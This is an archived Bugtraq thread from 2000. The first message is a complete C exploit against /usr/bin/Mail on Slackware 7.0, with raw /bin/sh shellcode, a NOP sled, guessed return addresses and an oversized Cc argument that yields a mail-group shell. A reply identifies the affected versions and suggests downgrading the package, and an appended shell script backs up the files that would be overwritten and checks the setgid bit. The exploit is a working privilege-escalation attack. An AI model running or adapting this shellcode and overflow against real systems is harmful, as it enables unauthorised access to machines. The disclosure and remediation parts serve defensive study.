5158316 2000-06-04  04:13  /72 lines/ Postmaster
Recipient: Bugtraq (import) <11139>
Subject: /usr/bin/Mail exploit for Slackware 7.0 (mail-slack.c)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID:  <39383B06.36DB64F6@nitnet.com.br>
Date:         Fri, 2 Jun 2000 19:53:58 -0300
Reply-To: Paulo Ribeiro <prrar@NITNET.COM.BR>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Paulo Ribeiro <prrar@NITNET.COM.BR>
X-To:         VULN-DEV@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

/*
 * mail-slak.c (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
 *
 * Exploit for /usr/bin/Mail.
 * Made specially for Slackware Linux 7.0.
 * Based on mailx.c by funkySh.
 *
 * OBS.: Without fprintf(stderr) it is not possible to print the message.
 *
 * USAGE:
 * slack$ ./mail-slak
 * type '.' and enter: .
 * Cc: too long to edit
 * sh-2.03$ id
 * uid=1000(user) gid=12(mail) groups=100(users)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>

char buffer[10000];
char shellcode[] =
        "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31"
        "\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x0c\xb1"
        "\x0c\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76"
        "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
        "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
        "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer: the value is left in %eax, which is
 * where the i386 ABI expects the return value (no explicit return). */
unsigned long getesp(void)
{
        __asm__("movl %esp,%eax");
}

int main(int argc, char **argv)
{
        int x;
        long addr = getesp() - 18000;   /* guessed address inside the sled */

        memset(buffer, 0x90, 10000);                        /* NOP sled */
        memcpy(buffer + 800, shellcode, strlen(shellcode));

        for(x = 876; x < 9998; x += 4)                      /* return addresses */
                *(int *)&buffer[x] = addr;

        fprintf(stderr, "type '.' and enter: ");

        /* oversized value for the -c (Cc:) argument; argument list ends
         * with a null pointer, as execl requires */
        execl("/usr/bin/Mail", "/usr/bin/Mail", "nobody", "-s",
                "blah", "-c", buffer, (char *)NULL);
        return 0;
}

/* mail-slack.c: EOF */
(5158316) ------------------------------------------

5161639 2000-06-05  03:50  /45 lines/ Postmaster
Recipient: Bugtraq (import) <11150>
Subject: Re: /usr/bin/Mail exploit for Slackware 7.0 (mail-slack.c)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
X-Sender: schulte@pop.schulte.org
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-ID:  <4.3.1.0.20000604044237.00be73e0@pop.schulte.org>
Date:         Sun, 4 Jun 2000 05:09:23 -0500
Reply-To: Christopher Schulte <christopher@SCHULTE.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Christopher Schulte <christopher@SCHULTE.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <39383B06.36DB64F6@nitnet.com.br>

At 07:53 PM 6/2/00 -0300, you wrote:
>/*
>  * mail-slak.c (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
>  *
>  * Exploit for /usr/bin/Mail.
>  * Made specially for Slackware Linux 7.0.

Sifting through the changelogs and package logs, it looks like mailx
was upgraded from 8.1.1-9 to 8.1.1-10 on August 20, 1999.  This was
after both the 3 and 4 series of slackware were released.  Both slack
3.6.0 and 4.0.0 appear to use the same mailx binary (neither of which
are susceptible to this).

Slack 7.x, however, is.....

One possible solution (I did not test this!) is to download a non-susceptible
version package, such as:

ftp://ftp.slackware.com/pub/slackware/slackware-4.0/slakware/n1/mailx.tgz

Backup binary and config files, of course.  You can uncompress the
.tgz and see exactly what files will be overwritten; it may suffice
to just cp the binary file itself.


--
Christopher Schulte | christopher@schulte.org
cell:612.986.4859   | home:651.225.4557 | fax: 651.315.3339
page:612.264.1115   | free:877.271.9245 | site: schulte.org

COMING SOON http://SchulteConsulting.COM/
reliable computer consulting at a fair price.
(5161639) ------------------------------------------(Re-wrapped)
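A helper for the replacement procedure in the reply above: list which files in the downloaded package already exist on the system (and so would be overwritten), back those files up with their paths preserved before extracting anything, and check whether the installed Mail binary carries the setgid bit that gives the exploit its gid=12(mail) shell. This is an added example, not code from either poster; the function names, the sample package layout and the optional command-line usage are my own, and it assumes the Slackware .tgz is a gzip'ed tar of paths relative to the root, as the package at the URL in the reply is.

```shell
#!/bin/sh
# Added example (not from the original posts). Assumes a Slackware-style
# .tgz: a gzip'ed tar whose entries are paths relative to / (e.g.
# ./usr/bin/Mail). Function names are this example's own.
set -u

# Print, sorted one per line, every regular file in PKG that already exists
# under ROOT and would therefore be overwritten by extraction.
# Usage: list_overwrites PKG.tgz [ROOT]   (ROOT defaults to /)
list_overwrites() {
    pkg=$1; root=${2:-/}
    tar tzf "$pkg" | while IFS= read -r entry; do
        case $entry in */) continue ;; esac     # directory entries
        rel=${entry#./}
        if [ -f "$root/$rel" ]; then
            printf '%s\n' "$rel"
        fi
    done | sort
}

# Copy each file list_overwrites reports into BACKUPDIR, keeping the relative
# path (BACKUPDIR/usr/bin/Mail, BACKUPDIR/etc/mail.rc, ...) so the old binary
# and config can be restored with cp -p. Prints the number of files saved.
# Usage: backup_overwrites PKG.tgz ROOT BACKUPDIR
backup_overwrites() {
    pkg=$1; root=$2; bak=$3
    mkdir -p "$bak"
    list_overwrites "$pkg" "$root" | while IFS= read -r rel; do
        mkdir -p "$bak/$(dirname "$rel")"
        cp -p "$root/$rel" "$bak/$rel"
    done
    find "$bak" -type f | wc -l | tr -d ' '
}

# Report whether FILE is setgid. /usr/bin/Mail is installed setgid mail on
# the affected release, which is why the overflow yields gid=12(mail).
# Prints "setgid" or "not-setgid".
setgid_state() {
    if [ -g "$1" ]; then
        echo setgid
    else
        echo not-setgid
    fi
}

# Direct usage:  sh this.sh mailx.tgz / /root/mailx-backup
if [ $# -eq 3 ]; then
    printf 'Files that would be overwritten:\n'
    list_overwrites "$1" "$2"
    printf 'Backed up %s file(s) to %s\n' "$(backup_overwrites "$1" "$2" "$3")" "$3"
    printf '%s is %s\n' "$2/usr/bin/Mail" "$(setgid_state "$2/usr/bin/Mail")"
fi
```

Running it against a staging copy of the root (second argument) rather than `/` lets you see the overwrite list without touching the live system; once the backup is in place, extracting the package or copying just the binary is the reply's remaining step.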